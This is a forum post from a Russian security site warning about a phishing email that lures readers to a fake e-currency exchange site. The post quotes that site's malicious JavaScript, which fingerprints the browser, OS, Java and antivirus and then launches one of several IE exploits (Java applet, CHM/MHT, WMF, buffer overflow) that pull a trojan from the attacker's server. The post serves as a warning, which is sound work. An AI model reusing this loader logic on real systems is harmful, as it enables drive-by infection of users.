информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
Где водятся OGRыSpanning Tree Protocol: недокументированное применение
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Блокировка российских аккаунтов... 
 Отзыв сертификатов ЦБ РФ, ПСБ,... 
 Памятка мирным людям во время информационной... 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / miscellaneous
Имя Пароль
ФОРУМ
все доски
FAQ
IRC
новые сообщения
site updates
guestbook
beginners
sysadmin
programming
operating systems
theory
web building
software
hardware
networking
law
hacking
gadgets
job
dnet
humor
miscellaneous
scrap
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
Осторожно!!! эксплойты от order@speedy-exchange.com 26.02.06 19:15  Число просмотров: 3319
Автор: Ara Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Всем привет! К нам на почту пришло следующее сообщение от order@speedy-exchange.com <speedy-exchange27@yandex.ru>:

-----------------------------

Dear, xxx@xxx.ru
Thank you for your Cash2Ecurrency Order.
This message is to confirm the successful posting of your order with the following data:
 
ORDER SUMMARY:
Order Identification Number: 7837571
Ecurrency Ordered: E-Gold
Exact Amount You Will Receive: 850 USD worth of E-Gold
Our Service Fee: 68.00 USD ( 8% )
Exact Amount We Have To Receive: 918.00 USD
E-Gold Account that we will fund: 1126589
 
PAYMENT METHOD: You have selected to transfer money to us using Bank Transfer
 
PAYER INFORMATION:
Name: Stanislav Rudnik
City: Moscow | Zip code: 215502 
Country: Russia
Your contact email address: xxx@xxx.ru
 
You can view your order status here: www.speedy-exchange.com/orderstatus.html 
Changes to this order can be made here: www.speedy-exchange.com/orderchange.html 
 
================================================
Thank you for your appreciation and for using Speedy-Exchange.com.
www.speedy-exchange.com

---

-----------------------------


При заходе на www.speedy-exchange.com (якобы система обмена электронных валют) в зависимости от версии браузера загружается эксплойт. HTML-код следующий:

<BODY>
<DIV id=header><A 
title="Speedy Exchange : Independent Electronic Gold Currency Exchanger | Featured Ecurrencies: E-Gold, 1MDC, Pecunix, E-Metal, E-Currency    Featured Payment Methods: Bank transfer, Western Union, Credit Cards, ATM Debit Cards, Virtual Cards" 
href="http://www.speedy-exchange.com"><IMG height=69 
alt="Speedy Exchange : Independent Electronic Gold Currency Exchanger | Featured Ecurrencies: E-Gold, 1MDC, Pecunix, E-Metal, E-Currency    Featured Payment Methods: Bank transfer, Western Union, Credit Cards, ATM Debit Cards, Virtual Cards" 
src="img/speedyexchangelogo.gif" width=234 border=0></A> 
<P></P></DIV><!-- end header -->
<DIV id=wrap><!-- content -->
<DIV id=content>
<DIV id=navlist>
<DIV id=left>
<H1></H1>
<p>Please, wait while page is loading...</p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
</DIV>
<DIV id=right>
<DIV id=bottom>
<DIV id=logolist></DIV><BR class=clear></DIV><!-- end bottom row --><!-- footer -->
<DIV id=footer>
<P></P>
<P class=endnote><A class=endnote 
title="About Speedy Exchange : An Electronic Gold Currency Market Maker" 
href="http://www.speedy-exchange.com">Speedy-Exchange.com | 
Phone/Fax: +1-270-5740406 | Email: contact [at] speedy-exchange.com | © 
speedy-exchange.com 2003 - 2005</A> <BR>Speedy Exchange offers, and provides its 
products and services as an independent third party unrelated to E-Gold, 
OmniPay, Pecunix or any other company. All conditions, fees and charges are 
subject to change without further notice. Western Union, E-Gold, Pecunix are 
registered trademarks of their respective owners. </P></DIV><!-- end footer --><!-- end wrap --></DIV>

<IFRAME name="StatPage" width=5 height=5 style="display:none"></IFRAME>
<IFRAME name="PageContainer" width=5 height=5 style="display:none"></IFRAME>
<DIV id="ObjectContainer"></DIV>
<IE:clientCaps ID="oClientCaps" /> 
<script type="text/javascript" language="JavaScript">
   
 function GetVersion(CLSID)
   {
            if (oClientCaps.isComponentInstalled(CLSID,"ComponentID"))
               {return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");}
            else
               {return Array(0,0,0,0);}
   }

 function Get_Win_Version(IE_vers)
   {
     if (IE_vers.indexOf('Windows 95') != -1) return "95"
     else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
     else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
     else if (IE_vers.indexOf('Windows 98') != -1) return "98"
     else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
     else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
     else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"
   }
 
 function Run_BOF()
   {
    self.focus();
    for (i=1 ; i <=4 ; i++)
    { 
        document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="pluginst.htm"></iframe>');
    }
    document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="ie0601d.htm"></iframe>');
   }
 
 var CGI_Script="http://www.speedy-exchange.com/cgi-bin/ie0601.cgi";
 
 if (navigator.appName=="Microsoft Internet Explorer")
   {
      Click_Request=CGI_Script+"?click";
      var InetPath=document.location.href;
      j=InetPath.lastIndexOf('/');
      InetPath=InetPath.slice(0,j);
      
      var ExploitNumber=1; 
      var IEversion=navigator.appVersion;
      var IEplatform=navigator.platform;
      if (IEplatform.search("Win32") != -1)
      {
         var WinOS=Get_Win_Version(IEversion);
         FullVersion=clientInformation.appMinorVersion;
         PatchList=FullVersion.split(";");
         for (var i=0; i < PatchList.length; i++)
         {  
           ServicePack=PatchList[i];
           j=ServicePack.indexOf('SP');
           if (j != -1)
           {  
              ServicePack=ServicePack.substr(j);
              Click_Request=Click_Request+'&'+ServicePack; 
           }
         }
         StatPage.location=Click_Request;
         var JVM_vers  = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}"); 
         var IE_vers   = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}");
         fNortonAV=0; fMcAfee=0; XP_SP2_patched=0;
         try
         {
           var oNortonAV=new ActiveXObject("NAVCfgWizDll.NAVCfgWizMgr"); //Norton Antivirus Config Wizard initialization
           fNortonAV=1;
         }
         catch(e){} 
         try
         {
           var oMcAfee=new ActiveXObject("McGDMgr.DwnldGroupMgr"); // McAfee Security Download Control initialization 
           fMcAfee=1;
         }
         catch(e){}

         switch (WinOS)
         {
             case "2K":
                       if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                       {  ExploitNumber=1;  }    
                       else                                // if JVM = 5.0.3810.0 or higher
                       {
                          if ((fNortonAV==0)&&(fMcAfee==0))
                          { ExploitNumber=3; } 
                          else
                          { ExploitNumber=2; }  
                       }
                       break;
             case "2K3":
                          if ((fNortonAV==0)&&(fMcAfee==0))
                          { ExploitNumber=3; } 
                          else
                          { ExploitNumber=4; }  
                       break;             
             case "XP":
                                                                
                            if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                            {  ExploitNumber=1;  }    
                            else                                // if JVM = 5.0.3810.0 or higher
                            {
                               for (var i=0; i < PatchList.length; i++)
                               {  
                                  if (PatchList[i]=="SP2")
                                  {  XP_SP2_patched=1; }
                                 
                               }
                               if (XP_SP2_patched==0)
                               {
                                  if ((fNortonAV==0)&&(fMcAfee==0))
                                  { ExploitNumber=3; } 
                                  else
                                  { ExploitNumber=4; } 
                               }
                               else
                               {
                                  if ((fNortonAV==0)&&(fMcAfee==0))
                                  { ExploitNumber=5; } 
                                  else
                                  { ExploitNumber=4; }   
                               }
                            }
                       break;          
             default:  
                       if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                       {  ExploitNumber=1;  }             
                       else
                       {  ExploitNumber=2;  }            // if JVM = 5.0.3810.0 or higher
                     
                       break;         
         }
         // launching exploit which number is depends on Windows and IE versions
        
         switch (ExploitNumber)
         {
             case  1:
                       Trojan_Path=CGI_Script+"?exploit=MS03-11";
                       ObjectContainer.innerHTML='<applet archive="'+InetPath+'/'+'ie0601a.jar" codebase="'+InetPath+'" code="TakePrivileges.class" width=1  height=1><param name="ModulePath" value="'+Trojan_Path+'"></applet>';
                       break;
             case  2:
                       CHM_base='//ie0601b.chm'+'::'+'/main.htm';  
                       Protocol=unescape("%6ds-i%74s:%6dh%74%6dl:");
Init_String=Protocol+'file://'+'C:\\MAIN.MHT!'+InetPath+CHM_base;
                       oMSITS=document.createElement("<OBJECT data='"+Init_String+"' type='text/x-scriptlet'></OBJECT>"); 
                       document.body.appendChild(oMSITS); 
                       document.title="Loaded !"; 
                       break;
             case  3:
window.open("ie0601c.htm","Info","left=2000,top=2000,screenX=2000,screenY=2000,width=50,height=50,scrollbars=1,menubar=0,titlebar=0,toolbar=0,status=0"); 
self.focus();
                       break; 
             case  4:
                       setTimeout('Run_BOF()',2000); 
                       break;
             case  5:
                       PageContainer.location="ie0601e.wmf";
                       break;  
             default:
                       break;                   
          }

      }
   }
   else
   {
       StatPage.location=CGI_Script+"?click";
   }
</script>
</BODY>

---
<miscellaneous> Поиск 






Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2022 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach